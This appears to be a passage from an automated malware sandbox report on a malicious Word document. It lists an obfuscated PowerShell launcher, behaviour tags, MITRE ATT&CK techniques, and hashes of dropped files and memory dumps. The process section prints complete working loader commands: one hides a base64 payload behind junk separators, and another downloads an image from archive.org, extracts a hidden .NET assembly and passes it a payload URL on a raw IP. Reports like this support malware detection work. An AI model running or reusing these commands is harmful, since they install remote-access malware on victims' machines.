᭣ ₊ ⤪QwBv⥼ ⫣ ᭣ ₊ ⤪G0⥼ ⫣ ᭣ ₊ ⤪bQBh⥼ ⫣ ᭣ ₊ ⤪G4⥼ ⫣ ᭣ ₊ ⤪Z⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪g⥼ ⫣ ᭣ ₊ ⤪D0⥼ ⫣ ᭣ ₊ ⤪I⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪k⥼ ⫣ ᭣ ₊ ⤪Gk⥼ ⫣ ᭣ ₊ ⤪bQBh⥼ ⫣ ᭣ ₊ ⤪Gc⥼ ⫣ ᭣ ₊ ⤪ZQBU⥼ ⫣ ᭣ ₊ ⤪GU⥼ ⫣ ᭣ ₊ ⤪e⥼ ⫣ ᭣ ₊ ⤪B0⥼ ⫣ ᭣ ₊ ⤪C4⥼ ⫣ ᭣ ₊ ⤪UwB1⥼ ⫣ ᭣ ₊ ⤪GI⥼ ⫣ ᭣ ₊ ⤪cwB0⥼ ⫣ ᭣ ₊ ⤪HI⥼ ⫣ ᭣ ₊ ⤪aQBu⥼ ⫣ ᭣ ₊ ⤪Gc⥼ ⫣ ᭣ ₊ ⤪K⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪k⥼ ⫣ ᭣ ₊ ⤪HM⥼ ⫣ ᭣ ₊ ⤪d⥼ ⫣ ᭣ ₊ ⤪Bh⥼ ⫣ ᭣ ₊ ⤪HI⥼ ⫣ ᭣ ₊ ⤪d⥼ ⫣ ᭣ ₊ ⤪BJ⥼ ⫣ ᭣ ₊ ⤪G4⥼ ⫣ ᭣ ₊ ⤪Z⥼ ⫣ ᭣ ₊ ⤪Bl⥼ ⫣ ᭣ ₊ ⤪Hg⥼ ⫣ ᭣ ₊ ⤪L⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪g⥼ ⫣ ᭣ ₊ ⤪CQ⥼ ⫣ ᭣ ₊ ⤪YgBh⥼ ⫣ ᭣ ₊ ⤪HM⥼ ⫣ ᭣ ₊ ⤪ZQ⥼ ⫣ ᭣ ₊ ⤪2⥼ ⫣ ᭣ ₊ ⤪DQ⥼ ⫣ ᭣ ₊ ⤪T⥼ ⫣ ᭣ ₊ ⤪Bl⥼ ⫣ ᭣ ₊ ⤪G4⥼ ⫣ ᭣ ₊ ⤪ZwB0⥼ ⫣ ᭣ ₊ ⤪Gg⥼ ⫣ ᭣ ₊ ⤪KQ⥼ ⫣ ᭣ ₊ ⤪7⥼ ⫣ ᭣ ₊ ⤪CQ⥼ ⫣ ᭣ ₊ ⤪YwBv⥼ ⫣ ᭣ ₊ ⤪G0⥼ ⫣ ᭣ ₊ ⤪bQBh⥼ ⫣ ᭣ ₊ ⤪G4⥼ ⫣ ᭣ ₊ ⤪Z⥼ ⫣ ᭣ ₊ ⤪BC⥼ ⫣ ᭣ ₊ ⤪Hk⥼ ⫣ ᭣ ₊ ⤪d⥼ ⫣ ᭣ ₊ ⤪Bl⥼ ⫣ ᭣ ₊ ⤪HM⥼ ⫣ ᭣ ₊ ⤪I⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪9⥼ ⫣ ᭣ ₊ ⤪C⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪WwBT⥼ ⫣ ᭣ ₊ ⤪Hk⥼ ⫣ ᭣ ₊ ⤪cwB0⥼ ⫣ ᭣ ₊ ⤪GU⥼ ⫣ ᭣ ₊ ⤪bQ⥼ ⫣ ᭣ ₊ ⤪u⥼ ⫣ ᭣ ₊ ⤪EM⥼ ⫣ ᭣ ₊ ⤪bwBu⥼ ⫣ ᭣ ₊ ⤪HY⥼ ⫣ ᭣ ₊ ⤪ZQBy⥼ ⫣ ᭣ ₊ ⤪HQ⥼ ⫣ ᭣ ₊ ⤪XQ⥼ ⫣ ᭣ ₊ ⤪6⥼ ⫣ ᭣ ₊ ⤪Do⥼ ⫣ ᭣ ₊ ⤪RgBy⥼ ⫣ ᭣ ₊ ⤪G8⥼ ⫣ ᭣ ₊ ⤪bQBC⥼ ⫣ ᭣ ₊ ⤪GE⥼ ⫣ ᭣ ₊ ⤪cwBl⥼ ⫣ ᭣ ₊ ⤪DY⥼ ⫣ ᭣ ₊ ⤪N⥼ ⫣ ᭣ ₊ ⤪BT⥼ ⫣ ᭣ ₊ ⤪HQ⥼ ⫣ ᭣ ₊ ⤪cgBp⥼ ⫣ ᭣ ₊ ⤪G4⥼ ⫣ ᭣ ₊ ⤪Zw⥼ ⫣ ᭣ ₊ ⤪o⥼ ⫣ ᭣ ₊ ⤪CQ⥼ ⫣ ᭣ ₊ ⤪YgBh⥼ ⫣ ᭣ ₊ ⤪HM⥼ ⫣ ᭣ ₊ ⤪ZQ⥼ ⫣ ᭣ ₊ ⤪2⥼ ⫣ ᭣ ₊ ⤪DQ⥼ ⫣ ᭣ ₊ ⤪QwBv⥼ ⫣ ᭣ ₊ ⤪G0⥼ ⫣ ᭣ ₊ ⤪bQBh⥼ ⫣ ᭣ ₊ ⤪G4⥼ ⫣ ᭣ ₊ ⤪Z⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪p⥼ ⫣ ᭣ ₊ ⤪Ds⥼ ⫣ ᭣ ₊ ⤪J⥼ ⫣ ᭣ ₊ ⤪Bs⥼ ⫣ ᭣ ₊ ⤪G8⥼ ⫣ ᭣ ₊ ⤪YQBk⥼ ⫣ ᭣ ₊ ⤪GU⥼ ⫣ ᭣ ₊ ⤪Z⥼ ⫣ ᭣ ₊ ⤪BB⥼ ⫣ ᭣ ₊ ⤪HM⥼ ⫣ ᭣ ₊ ⤪cwBl⥼ ⫣ ᭣ ₊ ⤪G0⥼ ⫣ ᭣ ₊ ⤪YgBs⥼ ⫣ ᭣ ₊ ⤪Hk⥼ ⫣ ᭣ ₊ ⤪I⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪9⥼ ⫣ ᭣ ₊ ⤪C⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪WwBT⥼ ⫣ ᭣ ₊ ⤪Hk⥼ ⫣ ᭣ ₊ ⤪cwB0⥼ ⫣ ᭣ ₊ ⤪GU⥼ ⫣ ᭣ ₊ ⤪bQ⥼ ⫣ ᭣ ₊ ⤪u⥼ ⫣ ᭣ ₊ ⤪FI⥼ ⫣ ᭣ ₊ ⤪ZQBm⥼ ⫣ ᭣ ₊ ⤪Gw⥼ ⫣ ᭣ ₊ ⤪ZQBj⥼ ⫣ ᭣ ₊ ⤪HQ⥼ ⫣ ᭣ ₊ ⤪aQBv⥼ ⫣ ᭣ ₊ ⤪G4⥼ ⫣ ᭣ ₊ ⤪LgBB⥼ ⫣ ᭣ ₊ ⤪HM⥼ ⫣ ᭣ ₊ ⤪cwBl⥼ ⫣ ᭣ ₊ ⤪G0⥼ ⫣ ᭣ ₊ ⤪YgBs⥼ ⫣ ᭣ ₊ ⤪Hk⥼ ⫣ ᭣ ₊ ⤪XQ⥼ ⫣ ᭣ ₊ ⤪6⥼ ⫣ ᭣ ₊ ⤪Do⥼ ⫣ ᭣ ₊ ⤪T⥼ ⫣ ᭣ ₊ ⤪Bv⥼ ⫣ ᭣ ₊ ⤪GE⥼ ⫣ ᭣ ₊ ⤪Z⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪o⥼ ⫣ ᭣ ₊ ⤪CQ⥼ ⫣ ᭣ ₊ ⤪YwBv⥼ ⫣ ᭣ ₊ ⤪G0⥼ ⫣ ᭣ ₊ ⤪bQBh⥼ ⫣ ᭣ ₊ ⤪G4⥼ ⫣ ᭣ ₊ ⤪Z⥼ ⫣ ᭣ ₊ ⤪BC⥼ ⫣ ᭣ ₊ ⤪Hk⥼ ⫣ ᭣ ₊ ⤪d⥼ ⫣ ᭣ ₊ ⤪Bl⥼ ⫣ ᭣ ₊ ⤪HM⥼ ⫣ ᭣ ₊ ⤪KQ⥼ ⫣ ᭣ ₊ ⤪7⥼ ⫣ ᭣ ₊ ⤪CQ⥼ ⫣ ᭣ ₊ ⤪d⥼ ⫣ ᭣ ₊ ⤪B5⥼ ⫣ ᭣ ₊ ⤪H⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪ZQ⥼ ⫣ ᭣ ₊ ⤪g⥼ ⫣ ᭣ ₊ ⤪D0⥼ ⫣ ᭣ ₊ ⤪I⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪k⥼ ⫣ ᭣ ₊ ⤪Gw⥼ ⫣ ᭣ ₊ ⤪bwBh⥼ ⫣ ᭣ ₊ ⤪GQ⥼ ⫣ ᭣ ₊ ⤪ZQBk⥼ ⫣ ᭣ ₊ ⤪EE⥼ ⫣ ᭣ ₊ ⤪cwBz⥼ ⫣ ᭣ ₊ ⤪GU⥼ ⫣ ᭣ ₊ ⤪bQBi⥼ ⫣ ᭣ ₊ ⤪Gw⥼ ⫣ ᭣ ₊ ⤪eQ⥼ ⫣ ᭣ ₊ ⤪u⥼ ⫣ ᭣ ₊ ⤪Ec⥼ ⫣ ᭣ ₊ ⤪ZQB0⥼ ⫣ ᭣ ₊ ⤪FQ⥼ ⫣ ᭣ ₊ ⤪eQBw⥼ ⫣ ᭣ ₊ ⤪GU⥼ ⫣ ᭣ ₊ ⤪K⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪n⥼ ⫣ ᭣ ₊ ⤪GQ⥼ ⫣ ᭣ ₊ ⤪bgBs⥼ ⫣ ᭣ ₊ ⤪Gk⥼ ⫣ ᭣ ₊ ⤪Yg⥼ ⫣ ᭣ ₊ ⤪u⥼ ⫣ ᭣ ₊ ⤪Ek⥼ ⫣ ᭣ ₊ ⤪Tw⥼ ⫣ ᭣ ₊ ⤪u⥼ ⫣ ᭣ ₊ ⤪Eg⥼ ⫣ ᭣ ₊ ⤪bwBt⥼ ⫣ ᭣ ₊ ⤪GU⥼ ⫣ ᭣ ₊ ⤪Jw⥼ ⫣ ᭣ ₊ ⤪p⥼ ⫣ ᭣ ₊ ⤪Ds⥼ ⫣ ᭣ ₊ ⤪J⥼ ⫣ ᭣ ₊ ⤪Bt⥼ ⫣ ᭣ ₊ ⤪GU⥼ ⫣ ᭣ ₊ ⤪d⥼ ⫣ ᭣ ₊ ⤪Bo⥼ ⫣ ᭣ ₊ ⤪G8⥼ ⫣ ᭣ ₊ ⤪Z⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪g⥼ ⫣ ᭣ ₊ ⤪D0⥼ ⫣ ᭣ ₊ ⤪I⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪k⥼ ⫣ ᭣ ₊ ⤪HQ⥼ ⫣ ᭣ ₊ ⤪eQBw⥼ ⫣ ᭣ ₊ ⤪GU⥼ ⫣ ᭣ ₊ ⤪LgBH⥼ ⫣ ᭣ ₊ ⤪GU⥼ ⫣ ᭣ ₊ ⤪d⥼ ⫣ ᭣ ₊ ⤪BN⥼ ⫣ ᭣ ₊ ⤪GU⥼ ⫣ ᭣ ₊ ⤪d⥼ ⫣ ᭣ ₊ ⤪Bo⥼ ⫣ ᭣ ₊ ⤪G8⥼ ⫣ ᭣ ₊ ⤪Z⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪o⥼ ⫣ ᭣ ₊ ⤪Cc⥼ ⫣ ᭣ ₊ ⤪VgBB⥼ ⫣ ᭣ ₊ ⤪Ek⥼ ⫣ ᭣ ₊ ⤪Jw⥼ ⫣ ᭣ ₊ ⤪p⥼ ⫣ ᭣ ₊ ⤪C4⥼ ⫣ ᭣ ₊ ⤪SQBu⥼ ⫣ ᭣ ₊ ⤪HY⥼ ⫣ ᭣ ₊ ⤪bwBr⥼ ⫣ ᭣ ₊ ⤪GU⥼ ⫣ ᭣ ₊ ⤪K⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪k⥼ ⫣ ᭣ ₊ ⤪G4⥼ ⫣ ᭣ ₊ ⤪dQBs⥼ ⫣ ᭣ ₊ ⤪Gw⥼ ⫣ ᭣ ₊ ⤪L⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪g⥼ ⫣ ᭣ ₊ ⤪Fs⥼ ⫣ ᭣ ₊ ⤪bwBi⥼ ⫣ ᭣ ₊ ⤪Go⥼ ⫣ ᭣ ₊ ⤪ZQBj⥼ ⫣ ᭣ ₊ ⤪HQ⥼ ⫣ ᭣ ₊ ⤪WwBd⥼ ⫣ ᭣ ₊ ⤪F0⥼ ⫣ ᭣ ₊ ⤪I⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪o⥼ ⫣ ᭣ ₊ ⤪Cc⥼ ⫣ ᭣ ₊ ⤪d⥼ ⫣ ᭣ ₊ ⤪B4⥼ ⫣ ᭣ ₊ ⤪HQ⥼ ⫣ ᭣ ₊ ⤪LgBS⥼ ⫣ ᭣ ₊ ⤪EM⥼ ⫣ ᭣ ₊ ⤪TgBL⥼ ⫣ ᭣ ₊ ⤪C8⥼ ⫣ ᭣ ₊ ⤪UgBO⥼ ⫣ ᭣ ₊ ⤪Es⥼ ⫣ ᭣ ₊ ⤪LwBw⥼ ⫣ ᭣ ₊ ⤪H⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪bQBh⥼ ⫣ ᭣ ₊ ⤪Hg⥼ ⫣ ᭣ ₊ ⤪Lw⥼ ⫣ ᭣ ₊ ⤪1⥼ ⫣ ᭣ ₊ ⤪DI⥼ ⫣ ᭣ ₊ ⤪Mg⥼ ⫣ ᭣ ₊ ⤪u⥼ ⫣ ᭣ ₊ ⤪DE⥼ ⫣ ᭣ ₊ ⤪O⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪u⥼ ⫣ ᭣ ₊ ⤪DI⥼ ⫣ ᭣ ₊ ⤪MQ⥼ ⫣ ᭣ ₊ ⤪u⥼ ⫣ ᭣ ₊ ⤪Dg⥼ ⫣ ᭣ ₊ ⤪OQ⥼ ⫣ ᭣ ₊ ⤪x⥼ ⫣ ᭣ ₊ ⤪C8⥼ ⫣ ᭣ ₊ ⤪Lw⥼ ⫣ ᭣ ₊ ⤪6⥼ ⫣ ᭣ ₊ ⤪H⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪d⥼ ⫣ ᭣ ₊ ⤪B0⥼ ⫣ ᭣ ₊ ⤪Gg⥼ ⫣ ᭣ ₊ ⤪Jw⥼ ⫣ ᭣ ₊ ⤪g⥼ ⫣ ᭣ ₊ ⤪Cw⥼ ⫣ ᭣ ₊ ⤪I⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪n⥼ ⫣ ᭣ ₊ ⤪GQ⥼ ⫣ ᭣ ₊ ⤪ZQBz⥼ ⫣ ᭣ ₊ ⤪GE⥼ ⫣ ᭣ ₊ ⤪d⥼ ⫣ ᭣ ₊ ⤪Bp⥼ ⫣ ᭣ ₊ ⤪HY⥼ ⫣ ᭣ ₊ ⤪YQBk⥼ ⫣ ᭣ ₊ ⤪G8⥼ ⫣ ᭣ ₊ ⤪Jw⥼ ⫣ ᭣ ₊ ⤪g⥼ ⫣ ᭣ ₊ ⤪Cw⥼ ⫣ ᭣ ₊ ⤪I⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪n⥼ ⫣ ᭣ ₊ ⤪GQ⥼ ⫣ ᭣ ₊ ⤪ZQBz⥼ ⫣ ᭣ ₊ ⤪GE⥼ ⫣ ᭣ ₊ ⤪d⥼ ⫣ ᭣ ₊ ⤪Bp⥼ ⫣ ᭣ ₊ ⤪HY⥼ ⫣ ᭣ ₊ ⤪YQBk⥼ ⫣ ᭣ ₊ ⤪G8⥼ ⫣ ᭣ ₊ ⤪Jw⥼ ⫣ ᭣ ₊ ⤪g⥼ ⫣ ᭣ ₊ ⤪Cw⥼ ⫣ ᭣ ₊ ⤪I⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪n⥼ ⫣ ᭣ ₊ ⤪GQ⥼ ⫣ ᭣ ₊ ⤪ZQBz⥼ ⫣ ᭣ ₊ ⤪GE⥼ ⫣ ᭣ ₊ ⤪d⥼ ⫣ ᭣ ₊ ⤪Bp⥼ ⫣ ᭣ ₊ ⤪HY⥼ ⫣ ᭣ ₊ ⤪YQBk⥼ ⫣ ᭣ ₊ ⤪G8⥼ ⫣ ᭣ ₊ ⤪Jw⥼ ⫣ ᭣ ₊ ⤪s⥼ ⫣ ᭣ ₊ ⤪Cc⥼ ⫣ ᭣ ₊ ⤪UgBl⥼ ⫣ ᭣ ₊ ⤪Gc⥼ ⫣ ᭣ ₊ ⤪QQBz⥼ ⫣ ᭣ ₊ ⤪G0⥼ ⫣ ᭣ ₊ ⤪Jw⥼ ⫣ ᭣ ₊ ⤪s⥼ ⫣ ᭣ ₊ ⤪Cc⥼ ⫣ ᭣ ₊ ⤪Jw⥼ ⫣ ᭣ ₊ ⤪p⥼ ⫣ ᭣ ₊ ⤪Ck⥼ ⫣ ᭣ ₊ ⤪';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('⥼ ⫣ ᭣ ₊ ⤪','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:564
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RCNK/RNK/ppmax/522.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1424

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Exploitation for Client Execution

T1203

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

Filesize
717B

MD5
822467b728b7a66b081c91795373789a

SHA1
d8f2f02e1eef62485a9feffd59ce837511749865

SHA256
af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

SHA512
bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7B7A69FF474CB55CBBEC817CB4508128

Filesize
344B

MD5
c3d72a98a264b0b2e2afe50c30cf82ef

SHA1
b135a8f621de4290a96130a71848b4eef3788885

SHA256
808591a1ec4060c2b44bc443ca511a42d84d8b7abbae617827e192b651588a49

SHA512
5b9e15c354645f3f13b8e30b46f46e8b2c3f77185c4af04bf68965e494415887188befcea0549f86b611721302e141ae61a6f65c7db7fb7be5545b0e89465703

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

Filesize
192B

MD5
710ea190b947a1935ed4b6c790308525

SHA1
b5489e1e2f3f2daa28ba0a766874f064231120b0

SHA256
71b875768389ce35dab2c27ee69154c9b0ab07a38f906e1d86304dc4676abf0c

SHA512
5dba27192368c9287fecb09f23bb0af6fc6d3340860e3a311308ff4f1b3961678e7db217e4572b78fd97112225da6f915e70be4b1c4f4973ad7f543588a5ba15

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7B7A69FF474CB55CBBEC817CB4508128

Filesize
540B

MD5
c7c1ed818a61d3cc76e56ab5a43d9c7a

SHA1
758bd0d5fb0e8f87288170f253fde62cb24cf1d6

SHA256
8d923e58afbe37d36b685ca24e4147fcc728e242fcfc1ca79c172e34f7b1c4f6

SHA512
254ae6f813d57cf73d5f713ee5ffccd131598517074faaf5ad490730d8253da39396cf0b8f43ee7a45bcceecbb2b0a6e848b387638f9d72fe5c659289f925e3b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{2791B13D-2E16-448C-A3DC-84796B12E9F5}.FSD

Filesize
128KB

MD5
3b030f399608454ae3de65deff046886

SHA1
a9afa657327eac051d0bd80f9b37f1c154f64185

SHA256
12033164513bf6a573a9d81dc2907105e155ab0a564f1e20d3152f716b9b93cb

SHA512
d0fb38cc6b986d2250a76075b43776a2ebe6882ad333cf39908ba675f24b5ae627b19fdabfbbe001d1b5872a9d8e921bfa851a258626bf430235e44f1332d10f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Filesize
128KB

MD5
e63a282fd05aadacc20ffb3acbbd4363

SHA1
df9e8d06ffb115f961582956daa51db31b7fa4a7

SHA256
d16cf0fbfeee766b098bb5a8ec8857629a35ca02cd8d5c6c9c6a00afa5a6ef18

SHA512
1f065b9c485f5b8d46a2796eb1f825cb78d0ca125c4f87c9b5e16921e31c371fb5611689ada0293d1edf678ad532ceb97c0e7ff9a4297b7a51347b577cb59acf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M7GT0RRO\yummycreamwithgoodchocolatemilkcreamaddedformakethebuttersmoothbunwhicheatedoncenevertellasneedbecauseitsverycutetobutter_____milkycream[1].doc

Filesize
82KB

MD5
92f62e534dc12ae19d56d691befb3127

SHA1
d70dd78b2218839911f2cce4af485185c02faae0

SHA256
a461f5cc81da5f2c57bf6a2d3fcca1a77ddcd43b47dd5b38ab04822ba7e10840

SHA512
c1cb1cb6fa02a76f1ab62470a6f92b065af13a446b612022d35b148633d306c6ababa7338705fb4e9c64a03cf758f888d947c132ecc425d1a8929f9bc310e49c

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabC4E6.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\{AB71319C-4267-4D00-A85E-FF8A151AD04E}

Filesize
128KB

MD5
cd3f78b258c8d6eb1569c579100c7597

SHA1
dfb689c6db1d351bf84f1167caff942b9a42a758

SHA256
580d6a2ccb3f8df6dfe98737be9986e0d2742825ab9fb8d8484e84efbbbbc6f4

SHA512
91bd6758b18ad307cebcbe4a2b8bd97d7ab3f8ac5ee2968a657e3179262efc6e6ab51e14c1bf2f81221345172b1595f4d48b2de194de7dcc724862a07d2d1c72

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
cdfcc335481e1a9e1569984428eae180

SHA1
131dbce102b62d97290797923b739548d908cfe1

SHA256
8b187206f329efcd463f24532634f3fb38920c1648c47244fca3669912b5b802

SHA512
96be2aca7b33b9a0239e6738b39533e62b96eedbe4da94f7d23c25f37344441b8c5ceb06406d524ee4cb3c9734d92839f8679b29d12f763301f93ea96a95c299

Download Submit
C:\Users\Admin\AppData\Roaming\weneedgoodcakewithbuttermilksw.vBS

Filesize
179KB

MD5
77af910544a55104df4c5022a217534a

SHA1
be76cfa44b6ce2b1a19d06722767b1dbc38b4cf8

SHA256
6709d25ec4ffa6d6dbf7dd1fbbc72d56418c5c7660a5598de2521980bce39828

SHA512
d5789021a8479919635e873bcb1c5bfd48467b68b92ce892c0fb65ca1403237cd4b35b9a8ab56f8023ecbf417df0cf569dbdafd727a6222eafe570c648d69870

Download Submit
memory/2088-21-0x0000000002D60000-0x0000000002D62000-memory.dmp

Filesize
8KB

Download
memory/2088-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2088-91-0x000000007219D000-0x00000000721A8000-memory.dmp

Filesize
44KB

Download
memory/2088-1-0x000000007219D000-0x00000000721A8000-memory.dmp

Filesize
44KB

Download
memory/2088-120-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2088-125-0x000000007219D000-0x00000000721A8000-memory.dmp

Filesize
44KB

Download
memory/2820-20-0x0000000003E60000-0x0000000003E62000-memory.dmp

Filesize
8KB

Download
memory/2820-92-0x000000007219D000-0x00000000721A8000-memory.dmp

Filesize
44KB

Download
memory/2820-18-0x000000007219D000-0x00000000721A8000-memory.dmp

Filesize
44KB

Download
memory/2820-16-0x000000002F801000-0x000000002F802000-memory.dmp

Filesize
4KB

Download
memory/2820-126-0x000000007219D000-0x00000000721A8000-memory.dmp

Filesize
44KB

Download